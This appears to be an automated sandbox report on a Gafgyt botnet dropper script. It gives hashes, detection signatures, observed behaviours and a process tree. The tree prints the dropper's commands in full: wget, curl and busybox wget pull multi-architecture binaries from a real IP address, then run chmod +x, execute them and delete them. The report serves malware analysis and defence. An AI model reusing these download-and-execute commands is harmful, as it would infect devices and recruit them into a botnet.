Analysis
-
max time kernel
148s -
max time network
151s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
08-12-2024 02:22
Static task
static1
Behavioral task
behavioral1
Sample
6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417.sh
-
Size
6KB
-
MD5
b853a7496951ffa293c154a1c2ab0cef
-
SHA1
cd23d84bfa383cb3eef6b8a210a755323d278068
-
SHA256
6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417
-
SHA512
315201607fbfeb29173ced022cebb46a1c936377bb62407fdb73bb9a65426e24aff333c7e727e5fbb7351de6f71f919e1dcec3204b41d01d781dfcfc171bab18
-
SSDEEP
96:vl0lolAlUlElAlwlclElElglUl6LlbzPnTjn37jjHTLXjTp+FH7RjdOMX+xj+wqd:oMVB3
Malware Config
Signatures
-
Detected Gafgyt variant 13 IoCs
resource yara_rule behavioral1/files/fstream-1.dat family_gafgyt behavioral1/files/fstream-2.dat family_gafgyt behavioral1/files/fstream-3.dat family_gafgyt behavioral1/files/fstream-4.dat family_gafgyt behavioral1/files/fstream-5.dat family_gafgyt behavioral1/files/fstream-6.dat family_gafgyt behavioral1/files/fstream-7.dat family_gafgyt behavioral1/files/fstream-8.dat family_gafgyt behavioral1/files/fstream-9.dat family_gafgyt behavioral1/files/fstream-10.dat family_gafgyt behavioral1/files/fstream-11.dat family_gafgyt behavioral1/files/fstream-12.dat family_gafgyt behavioral1/files/fstream-13.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 54 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1735 chmod 1566 chmod 1575 chmod 1604 chmod 1673 chmod 1728 chmod 1665 chmod 1747 chmod 1580 chmod 1585 chmod 1521 chmod 1645 chmod 1661 chmod 1685 chmod 1556 chmod 1616 chmod 1641 chmod 1757 chmod 1516 chmod 1626 chmod 1631 chmod 1636 chmod 1649 chmod 1740 chmod 1528 chmod 1621 chmod 1669 chmod 1711 chmod 1716 chmod 1689 chmod 1509 chmod 1570 chmod 1609 chmod 1677 chmod 1697 chmod 1701 chmod 1752 chmod 1485 chmod 1546 chmod 1706 chmod 1657 chmod 1504 chmod 1533 chmod 1561 chmod 1592 chmod 1597 chmod 1723 chmod 1490 chmod 1541 chmod 1681 chmod 1551 chmod 1653 chmod 1693 chmod 1762 chmod -
Executes dropped EXE 52 IoCs
ioc pid Process /tmp/m-.ips 1486 m-.ips /tmp/m-i.p.-se.l 1491 m-i.p.-se.l /tmp/s-..-h-.4 1505 s-..-h-.4 /tmp/x.8-.-6.- 1510 x.8-.-6.- /tmp/a.-r.-m6 1517 a.-r.-m6 /tmp/i--6.-.86 1522 i--6.-.86 /tmp/p--.-pc 1529 p--.-pc /tmp/i5.-.8..-6 1534 i5.-.8..-6 /tmp/m.-..-6-.-8k 1542 m.-..-6-.-8k /tmp/s-.-pa.-rc 1547 s-.-pa.-rc /tmp/a-.-r.-m.-4 1552 a-.-r.-m.-4 /tmp/a.-.--.r.--m-.--5 1557 a.-.--.r.--m-.--5 /tmp/a.r.-.m7 1562 a.r.-.m7 /tmp/m-.ips 1571 m-.ips /tmp/m-i.p.-se.l 1576 m-i.p.-se.l /tmp/s-..-h-.4 1581 s-..-h-.4 /tmp/x.8-.-6.- 1586 x.8-.-6.- /tmp/a.-r.-m6 1593 a.-r.-m6 /tmp/i--6.-.86 1598 i--6.-.86 /tmp/p--.-pc 1605 p--.-pc /tmp/i5.-.8..-6 1610 i5.-.8..-6 /tmp/m.-..-6-.-8k 1617 m.-..-6-.-8k /tmp/s-.-pa.-rc 1622 s-.-pa.-rc /tmp/a-.-r.-m.-4 1627 a-.-r.-m.-4 /tmp/a.-.--.r.--m-.--5 1632 a.-.--.r.--m-.--5 /tmp/a.r.-.m7 1637 a.r.-.m7 /tmp/p-.-.p.-.c 1642 p-.-.p.-.c /tmp/m-.ips 1646 m-.ips /tmp/m-i.p.-se.l 1650 m-i.p.-se.l /tmp/s-..-h-.4 1654 s-..-h-.4 /tmp/x.8-.-6.- 1658 x.8-.-6.- /tmp/a.-r.-m6 1662 a.-r.-m6 /tmp/i--6.-.86 1666 i--6.-.86 /tmp/p--.-pc 1670 p--.-pc /tmp/i5.-.8..-6 1674 i5.-.8..-6 /tmp/m.-..-6-.-8k 1678 m.-..-6-.-8k /tmp/s-.-pa.-rc 1682 s-.-pa.-rc /tmp/a-.-r.-m.-4 1686 a-.-r.-m.-4 /tmp/a.-.--.r.--m-.--5 1690 a.-.--.r.--m-.--5 /tmp/a.r.-.m7 1694 a.r.-.m7 /tmp/p-.-.p.-.c 1698 p-.-.p.-.c /tmp/m-.ips 1702 m-.ips /tmp/m-i.p.-se.l 1707 m-i.p.-se.l /tmp/s-..-h-.4 1712 s-..-h-.4 /tmp/x.8-.-6.- 1717 x.8-.-6.- /tmp/a.-r.-m6 1724 a.-r.-m6 /tmp/i--6.-.86 1729 i--6.-.86 /tmp/p--.-pc 1736 p--.-pc /tmp/i5.-.8..-6 1741 i5.-.8..-6 /tmp/m.-..-6-.-8k 1748 m.-..-6-.-8k /tmp/s-.-pa.-rc 1753 s-.-pa.-rc /tmp/a-.-r.-m.-4 1758 a-.-r.-m.-4 -
Modifies Watchdog functionality 1 TTPs 18 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog x.8-.-6.- File opened for modification /dev/misc/watchdog i--6.-.86 File opened for modification /dev/misc/watchdog x.8-.-6.- File opened for modification /dev/watchdog i--6.-.86 File opened for modification /dev/watchdog x.8-.-6.- File opened for modification /dev/misc/watchdog i--6.-.86 File opened for modification /dev/watchdog i5.-.8..-6 File opened for modification /dev/misc/watchdog i5.-.8..-6 File opened for modification /dev/watchdog i5.-.8..-6 File opened for modification /dev/watchdog i5.-.8..-6 File opened for modification /dev/watchdog i--6.-.86 File opened for modification /dev/misc/watchdog i5.-.8..-6 File opened for modification /dev/misc/watchdog x.8-.-6.- File opened for modification /dev/watchdog i--6.-.86 File opened for modification /dev/misc/watchdog i5.-.8..-6 File opened for modification /dev/watchdog x.8-.-6.- File opened for modification /dev/misc/watchdog i--6.-.86 File opened for modification /dev/watchdog x.8-.-6.- -
Reads system routing table 1 TTPs 9 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route i5.-.8..-6 File opened for reading /proc/net/route i5.-.8..-6 File opened for reading /proc/net/route i--6.-.86 File opened for reading /proc/net/route i5.-.8..-6 File opened for reading /proc/net/route x.8-.-6.- File opened for reading /proc/net/route i--6.-.86 File opened for reading /proc/net/route x.8-.-6.- File opened for reading /proc/net/route x.8-.-6.- File opened for reading /proc/net/route i--6.-.86 -
Changes its process name 9 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself sshd 1510 x.8-.-6.- Changes the process name, possibly in an attempt to hide itself sshd 1522 i--6.-.86 Changes the process name, possibly in an attempt to hide itself sshd 1534 i5.-.8..-6 Changes the process name, possibly in an attempt to hide itself sshd 1586 x.8-.-6.- Changes the process name, possibly in an attempt to hide itself sshd 1598 i--6.-.86 Changes the process name, possibly in an attempt to hide itself sshd 1610 i5.-.8..-6 Changes the process name, possibly in an attempt to hide itself sshd 1717 x.8-.-6.- Changes the process name, possibly in an attempt to hide itself sshd 1729 i--6.-.86 Changes the process name, possibly in an attempt to hide itself sshd 1741 i5.-.8..-6 -
Reads system network configuration 1 TTPs 9 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route i5.-.8..-6 File opened for reading /proc/net/route x.8-.-6.- File opened for reading /proc/net/route i5.-.8..-6 File opened for reading /proc/net/route x.8-.-6.- File opened for reading /proc/net/route i--6.-.86 File opened for reading /proc/net/route i--6.-.86 File opened for reading /proc/net/route i5.-.8..-6 File opened for reading /proc/net/route x.8-.-6.- File opened for reading /proc/net/route i--6.-.86 -
System Network Configuration Discovery 1 TTPs 11 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1571 m-.ips 1646 m-.ips 1647 rm 1702 m-.ips 1704 rm 1481 wget 1486 m-.ips 1488 rm 1569 curl 1573 rm 1700 busybox -
Writes file to tmp directory 39 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/m-.ips busybox File opened for modification /tmp/m-i.p.-se.l wget File opened for modification /tmp/m-i.p.-se.l curl File opened for modification /tmp/i--6.-.86 curl File opened for modification /tmp/a.-.--.r.--m-.--5 curl File opened for modification /tmp/a.r.-.m7 wget File opened for modification /tmp/a.-r.-m6 curl File opened for modification /tmp/m-.ips wget File opened for modification /tmp/p--.-pc wget File opened for modification /tmp/i5.-.8..-6 wget File opened for modification /tmp/m.-..-6-.-8k wget File opened for modification /tmp/s-..-h-.4 wget File opened for modification /tmp/m-.ips curl File opened for modification /tmp/a-.-r.-m.-4 curl File opened for modification /tmp/a-.-r.-m.-4 wget File opened for modification /tmp/s-..-h-.4 curl File opened for modification /tmp/s-..-h-.4 busybox File opened for modification /tmp/a.-.--.r.--m-.--5 busybox File opened for modification /tmp/x.8-.-6.- wget File opened for modification /tmp/p--.-pc curl File opened for modification /tmp/x.8-.-6.- busybox File opened for modification /tmp/a.-r.-m6 busybox File opened for modification /tmp/i--6.-.86 busybox File opened for modification /tmp/i5.-.8..-6 busybox File opened for modification /tmp/a-.-r.-m.-4 busybox File opened for modification /tmp/a.-r.-m6 wget File opened for modification /tmp/s-.-pa.-rc curl File opened for modification /tmp/a.r.-.m7 curl File opened for modification /tmp/m-i.p.-se.l busybox File opened for modification /tmp/i--6.-.86 wget File opened for modification /tmp/s-.-pa.-rc wget File opened for modification /tmp/p--.-pc busybox File opened for modification /tmp/s-.-pa.-rc busybox File opened for modification /tmp/p-.-.p.-.c curl File opened for modification /tmp/m.-..-6-.-8k busybox File opened for modification /tmp/a.-.--.r.--m-.--5 wget File opened for modification /tmp/x.8-.-6.- curl File opened for modification /tmp/i5.-.8..-6 curl File opened for modification /tmp/m.-..-6-.-8k curl
Processes
-
/tmp/6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417.sh/tmp/6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417.sh1⤵PID:1480
-
/usr/bin/wgetwget http://93.123.85.60/m-.ips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1481
-
-
/bin/chmodchmod +x m-.ips2⤵
- File and Directory Permissions Modification
PID:1485
-
-
/tmp/m-.ips./m-.ips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1486
-
-
/bin/rmrm -rf m-.ips2⤵
- System Network Configuration Discovery
PID:1488
-
-
/usr/bin/wgetwget http://93.123.85.60/m-i.p.-se.l2⤵
- Writes file to tmp directory
PID:1489
-
-
/bin/chmodchmod +x m-i.p.-se.l2⤵
- File and Directory Permissions Modification
PID:1490
-
-
/tmp/m-i.p.-se.l./m-i.p.-se.l2⤵
- Executes dropped EXE
PID:1491
-
-
/bin/rmrm -rf m-i.p.-se.l2⤵PID:1493
-
-
/usr/bin/wgetwget http://93.123.85.60/s-..-h-.42⤵
- Writes file to tmp directory
PID:1494
-
-
/bin/chmodchmod +x s-..-h-.42⤵
- File and Directory Permissions Modification
PID:1504
-
-
/tmp/s-..-h-.4./s-..-h-.42⤵
- Executes dropped EXE
PID:1505
-
-
/bin/rmrm -rf s-..-h-.42⤵PID:1507
-
-
/usr/bin/wgetwget http://93.123.85.60/x.8-.-6.-2⤵
- Writes file to tmp directory
PID:1508
-
-
/bin/chmodchmod +x x.8-.-6.-2⤵
- File and Directory Permissions Modification
PID:1509
-
-
/tmp/x.8-.-6.-./x.8-.-6.-2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1510
-
-
/bin/rmrm -rf x.8-.-6.-2⤵PID:1514
-
-
/usr/bin/wgetwget http://93.123.85.60/a.-r.-m62⤵
- Writes file to tmp directory
PID:1515
-
-
/bin/chmodchmod +x a.-r.-m62⤵
- File and Directory Permissions Modification
PID:1516
-
-
/tmp/a.-r.-m6./a.-r.-m62⤵
- Executes dropped EXE
PID:1517
-
-
/bin/rmrm -rf a.-r.-m62⤵PID:1519
-
-
/usr/bin/wgetwget http://93.123.85.60/i--6.-.862⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/chmodchmod +x i--6.-.862⤵
- File and Directory Permissions Modification
PID:1521
-
-
/tmp/i--6.-.86./i--6.-.862⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1522
-
-
/bin/rmrm -rf i--6.-.862⤵PID:1526
-
-
/usr/bin/wgetwget http://93.123.85.60/p--.-pc2⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/chmodchmod +x p--.-pc2⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/p--.-pc./p--.-pc2⤵
- Executes dropped EXE
PID:1529
-
-
/bin/rmrm -rf p--.-pc2⤵PID:1531
-
-
/usr/bin/wgetwget http://93.123.85.60/i5.-.8..-62⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/chmodchmod +x i5.-.8..-62⤵
- File and Directory Permissions Modification
PID:1533
-
-
/tmp/i5.-.8..-6./i5.-.8..-62⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1534
-
-
/bin/rmrm -rf i5.-.8..-62⤵PID:1538
-
-
/usr/bin/wgetwget http://93.123.85.60/m.-..-6-.-8k2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/chmodchmod +x m.-..-6-.-8k2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/m.-..-6-.-8k./m.-..-6-.-8k2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm -rf m.-..-6-.-8k2⤵PID:1544
-
-
/usr/bin/wgetwget http://93.123.85.60/s-.-pa.-rc2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/chmodchmod +x s-.-pa.-rc2⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/s-.-pa.-rc./s-.-pa.-rc2⤵
- Executes dropped EXE
PID:1547
-
-
/bin/rmrm -rf s-.-pa.-rc2⤵PID:1549
-
-
/usr/bin/wgetwget http://93.123.85.60/a-.-r.-m.-42⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/chmodchmod +x a-.-r.-m.-42⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/a-.-r.-m.-4./a-.-r.-m.-42⤵
- Executes dropped EXE
PID:1552
-
-
/bin/rmrm -rf a-.-r.-m.-42⤵PID:1554
-
-
/usr/bin/wgetwget http://93.123.85.60/a.-.--.r.--m-.--52⤵
- Writes file to tmp directory
PID:1555
-
-
/bin/chmodchmod +x a.-.--.r.--m-.--52⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/a.-.--.r.--m-.--5./a.-.--.r.--m-.--52⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm -rf a.-.--.r.--m-.--52⤵PID:1559
-
-
/usr/bin/wgetwget http://93.123.85.60/a.r.-.m72⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/chmodchmod +x a.r.-.m72⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/a.r.-.m7./a.r.-.m72⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm -rf a.r.-.m72⤵PID:1564
-
-
/usr/bin/wgetwget http://93.123.85.60/p-.-.p.-.c2⤵PID:1565
-
-
/bin/chmodchmod +x p-.-.p.-.c2⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/p-.-.p.-.c./p-.-.p.-.c2⤵PID:1567
-
-
/bin/rmrm -rf p-.-.p.-.c2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://93.123.85.60/m-.ips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1569
-
-
/bin/chmodchmod +x m-.ips2⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/m-.ips./m-.ips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1571
-
-
/bin/rmrm -rf m-.ips2⤵
- System Network Configuration Discovery
PID:1573
-
-
/usr/bin/curlcurl -O http://93.123.85.60/m-i.p.-se.l2⤵
- Writes file to tmp directory
PID:1574
-
-
/bin/chmodchmod +x m-i.p.-se.l2⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/m-i.p.-se.l./m-i.p.-se.l2⤵
- Executes dropped EXE
PID:1576
-
-
/bin/rmrm -rf m-i.p.-se.l2⤵PID:1578
-
-
/usr/bin/curlcurl -O http://93.123.85.60/s-..-h-.42⤵
- Writes file to tmp directory
PID:1579
-
-
/bin/chmodchmod +x s-..-h-.42⤵
- File and Directory Permissions Modification
PID:1580
-
-
/tmp/s-..-h-.4./s-..-h-.42⤵
- Executes dropped EXE
PID:1581
-
-
/bin/rmrm -rf s-..-h-.42⤵PID:1583
-
-
/usr/bin/curlcurl -O http://93.123.85.60/x.8-.-6.-2⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/chmodchmod +x x.8-.-6.-2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/x.8-.-6.-./x.8-.-6.-2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1586
-
-
/bin/rmrm -rf x.8-.-6.-2⤵PID:1590
-
-
/usr/bin/curlcurl -O http://93.123.85.60/a.-r.-m62⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/chmodchmod +x a.-r.-m62⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/a.-r.-m6./a.-r.-m62⤵
- Executes dropped EXE
PID:1593
-
-
/bin/rmrm -rf a.-r.-m62⤵PID:1595
-
-
/usr/bin/curlcurl -O http://93.123.85.60/i--6.-.862⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/chmodchmod +x i--6.-.862⤵
- File and Directory Permissions Modification
PID:1597
-
-
/tmp/i--6.-.86./i--6.-.862⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1598
-
-
/bin/rmrm -rf i--6.-.862⤵PID:1602
-
-
/usr/bin/curlcurl -O http://93.123.85.60/p--.-pc2⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/chmodchmod +x p--.-pc2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/p--.-pc./p--.-pc2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm -rf p--.-pc2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://93.123.85.60/i5.-.8..-62⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/chmodchmod +x i5.-.8..-62⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/i5.-.8..-6./i5.-.8..-62⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1610
-
-
/bin/rmrm -rf i5.-.8..-62⤵PID:1614
-
-
/usr/bin/curlcurl -O http://93.123.85.60/m.-..-6-.-8k2⤵
- Writes file to tmp directory
PID:1615
-
-
/bin/chmodchmod +x m.-..-6-.-8k2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/m.-..-6-.-8k./m.-..-6-.-8k2⤵
- Executes dropped EXE
PID:1617
-
-
/bin/rmrm -rf m.-..-6-.-8k2⤵PID:1619
-
-
/usr/bin/curlcurl -O http://93.123.85.60/s-.-pa.-rc2⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/chmodchmod +x s-.-pa.-rc2⤵
- File and Directory Permissions Modification
PID:1621
-
-
/tmp/s-.-pa.-rc./s-.-pa.-rc2⤵
- Executes dropped EXE
PID:1622
-
-
/bin/rmrm -rf s-.-pa.-rc2⤵PID:1624
-
-
/usr/bin/curlcurl -O http://93.123.85.60/a-.-r.-m.-42⤵
- Writes file to tmp directory
PID:1625
-
-
/bin/chmodchmod +x a-.-r.-m.-42⤵
- File and Directory Permissions Modification
PID:1626
-
-
/tmp/a-.-r.-m.-4./a-.-r.-m.-42⤵
- Executes dropped EXE
PID:1627
-
-
/bin/rmrm -rf a-.-r.-m.-42⤵PID:1629
-
-
/usr/bin/curlcurl -O http://93.123.85.60/a.-.--.r.--m-.--52⤵
- Writes file to tmp directory
PID:1630
-
-
/bin/chmodchmod +x a.-.--.r.--m-.--52⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/a.-.--.r.--m-.--5./a.-.--.r.--m-.--52⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm -rf a.-.--.r.--m-.--52⤵PID:1634
-
-
/usr/bin/curlcurl -O http://93.123.85.60/a.r.-.m72⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/chmodchmod +x a.r.-.m72⤵
- File and Directory Permissions Modification
PID:1636
-
-
/tmp/a.r.-.m7./a.r.-.m72⤵
- Executes dropped EXE
PID:1637
-
-
/bin/rmrm -rf a.r.-.m72⤵PID:1639
-
-
/usr/bin/curlcurl -O http://93.123.85.60/p-.-.p.-.c2⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/chmodchmod +x p-.-.p.-.c2⤵
- File and Directory Permissions Modification
PID:1641
-
-
/tmp/p-.-.p.-.c./p-.-.p.-.c2⤵
- Executes dropped EXE
PID:1642
-
-
/bin/rmrm -rf p-.-.p.-.c2⤵PID:1643
-
-
/bin/chmodchmod +x m-.ips2⤵
- File and Directory Permissions Modification
PID:1645
-
-
/tmp/m-.ips./m-.ips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1646
-
-
/bin/rmrm -rf m-.ips2⤵
- System Network Configuration Discovery
PID:1647
-
-
/bin/chmodchmod +x m-i.p.-se.l2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/m-i.p.-se.l./m-i.p.-se.l2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm -rf m-i.p.-se.l2⤵PID:1651
-
-
/bin/chmodchmod +x s-..-h-.42⤵
- File and Directory Permissions Modification
PID:1653
-
-
/tmp/s-..-h-.4./s-..-h-.42⤵
- Executes dropped EXE
PID:1654
-
-
/bin/rmrm -rf s-..-h-.42⤵PID:1655
-
-
/bin/chmodchmod +x x.8-.-6.-2⤵
- File and Directory Permissions Modification
PID:1657
-
-
/tmp/x.8-.-6.-./x.8-.-6.-2⤵
- Executes dropped EXE
PID:1658
-
-
/bin/rmrm -rf x.8-.-6.-2⤵PID:1659
-
-
/bin/chmodchmod +x a.-r.-m62⤵
- File and Directory Permissions Modification
PID:1661
-
-
/tmp/a.-r.-m6./a.-r.-m62⤵
- Executes dropped EXE
PID:1662
-
-
/bin/rmrm -rf a.-r.-m62⤵PID:1663
-
-
/bin/chmodchmod +x i--6.-.862⤵
- File and Directory Permissions Modification
PID:1665
-
-
/tmp/i--6.-.86./i--6.-.862⤵
- Executes dropped EXE
PID:1666
-
-
/bin/rmrm -rf i--6.-.862⤵PID:1667
-
-
/bin/chmodchmod +x p--.-pc2⤵
- File and Directory Permissions Modification
PID:1669
-
-
/tmp/p--.-pc./p--.-pc2⤵
- Executes dropped EXE
PID:1670
-
-
/bin/rmrm -rf p--.-pc2⤵PID:1671
-
-
/bin/chmodchmod +x i5.-.8..-62⤵
- File and Directory Permissions Modification
PID:1673
-
-
/tmp/i5.-.8..-6./i5.-.8..-62⤵
- Executes dropped EXE
PID:1674
-
-
/bin/rmrm -rf i5.-.8..-62⤵PID:1675
-
-
/bin/chmodchmod +x m.-..-6-.-8k2⤵
- File and Directory Permissions Modification
PID:1677
-
-
/tmp/m.-..-6-.-8k./m.-..-6-.-8k2⤵
- Executes dropped EXE
PID:1678
-
-
/bin/rmrm -rf m.-..-6-.-8k2⤵PID:1679
-
-
/bin/chmodchmod +x s-.-pa.-rc2⤵
- File and Directory Permissions Modification
PID:1681
-
-
/tmp/s-.-pa.-rc./s-.-pa.-rc2⤵
- Executes dropped EXE
PID:1682
-
-
/bin/rmrm -rf s-.-pa.-rc2⤵PID:1683
-
-
/bin/chmodchmod +x a-.-r.-m.-42⤵
- File and Directory Permissions Modification
PID:1685
-
-
/tmp/a-.-r.-m.-4./a-.-r.-m.-42⤵
- Executes dropped EXE
PID:1686
-
-
/bin/rmrm -rf a-.-r.-m.-42⤵PID:1687
-
-
/bin/chmodchmod +x a.-.--.r.--m-.--52⤵
- File and Directory Permissions Modification
PID:1689
-
-
/tmp/a.-.--.r.--m-.--5./a.-.--.r.--m-.--52⤵
- Executes dropped EXE
PID:1690
-
-
/bin/rmrm -rf a.-.--.r.--m-.--52⤵PID:1691
-
-
/bin/chmodchmod +x a.r.-.m72⤵
- File and Directory Permissions Modification
PID:1693
-
-
/tmp/a.r.-.m7./a.r.-.m72⤵
- Executes dropped EXE
PID:1694
-
-
/bin/rmrm -rf a.r.-.m72⤵PID:1695
-
-
/bin/chmodchmod +x p-.-.p.-.c2⤵
- File and Directory Permissions Modification
PID:1697
-
-
/tmp/p-.-.p.-.c./p-.-.p.-.c2⤵
- Executes dropped EXE
PID:1698
-
-
/bin/rmrm -rf p-.-.p.-.c2⤵PID:1699
-
-
/bin/busyboxbusybox wget -O m-.ips http://93.123.85.60/m-.ips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1700
-
-
/bin/chmodchmod +x m-.ips2⤵
- File and Directory Permissions Modification
PID:1701
-
-
/tmp/m-.ips./m-.ips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1702
-
-
/bin/rmrm -rf m-.ips2⤵
- System Network Configuration Discovery
PID:1704
-
-
/bin/busyboxbusybox wget -O m-i.p.-se.l http://93.123.85.60/m-i.p.-se.l2⤵
- Writes file to tmp directory
PID:1705
-
-
/bin/chmodchmod +x m-i.p.-se.l2⤵
- File and Directory Permissions Modification
PID:1706
-
-
/tmp/m-i.p.-se.l./m-i.p.-se.l2⤵
- Executes dropped EXE
PID:1707
-
-
/bin/rmrm -rf m-i.p.-se.l2⤵PID:1709
-
-
/bin/busyboxbusybox wget -O s-..-h-.4 http://93.123.85.60/s-..-h-.42⤵
- Writes file to tmp directory
PID:1710
-
-
/bin/chmodchmod +x s-..-h-.42⤵
- File and Directory Permissions Modification
PID:1711
-
-
/tmp/s-..-h-.4./s-..-h-.42⤵
- Executes dropped EXE
PID:1712
-
-
/bin/rmrm -rf s-..-h-.42⤵PID:1714
-
-
/bin/busyboxbusybox wget -O x.8-.-6.- http://93.123.85.60/x.8-.-6.-2⤵
- Writes file to tmp directory
PID:1715
-
-
/bin/chmodchmod +x x.8-.-6.-2⤵
- File and Directory Permissions Modification
PID:1716
-
-
/tmp/x.8-.-6.-./x.8-.-6.-2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1717
-
-
/bin/rmrm -rf x.8-.-6.-2⤵PID:1721
-
-
/bin/busyboxbusybox wget -O a.-r.-m6 http://93.123.85.60/a.-r.-m62⤵
- Writes file to tmp directory
PID:1722
-
-
/bin/chmodchmod +x a.-r.-m62⤵
- File and Directory Permissions Modification
PID:1723
-
-
/tmp/a.-r.-m6./a.-r.-m62⤵
- Executes dropped EXE
PID:1724
-
-
/bin/rmrm -rf a.-r.-m62⤵PID:1726
-
-
/bin/busyboxbusybox wget -O i--6.-.86 http://93.123.85.60/i--6.-.862⤵
- Writes file to tmp directory
PID:1727
-
-
/bin/chmodchmod +x i--6.-.862⤵
- File and Directory Permissions Modification
PID:1728
-
-
/tmp/i--6.-.86./i--6.-.862⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1729
-
-
/bin/rmrm -rf i--6.-.862⤵PID:1733
-
-
/bin/busyboxbusybox wget -O p--.-pc http://93.123.85.60/p--.-pc2⤵
- Writes file to tmp directory
PID:1734
-
-
/bin/chmodchmod +x p--.-pc2⤵
- File and Directory Permissions Modification
PID:1735
-
-
/tmp/p--.-pc./p--.-pc2⤵
- Executes dropped EXE
PID:1736
-
-
/bin/rmrm -rf p--.-pc2⤵PID:1738
-
-
/bin/busyboxbusybox wget -O i5.-.8..-6 http://93.123.85.60/i5.-.8..-62⤵
- Writes file to tmp directory
PID:1739
-
-
/bin/chmodchmod +x i5.-.8..-62⤵
- File and Directory Permissions Modification
PID:1740
-
-
/tmp/i5.-.8..-6./i5.-.8..-62⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1741
-
-
/bin/rmrm -rf i5.-.8..-62⤵PID:1745
-
-
/bin/busyboxbusybox wget -O m.-..-6-.-8k http://93.123.85.60/m.-..-6-.-8k2⤵
- Writes file to tmp directory
PID:1746
-
-
/bin/chmodchmod +x m.-..-6-.-8k2⤵
- File and Directory Permissions Modification
PID:1747
-
-
/tmp/m.-..-6-.-8k./m.-..-6-.-8k2⤵
- Executes dropped EXE
PID:1748
-
-
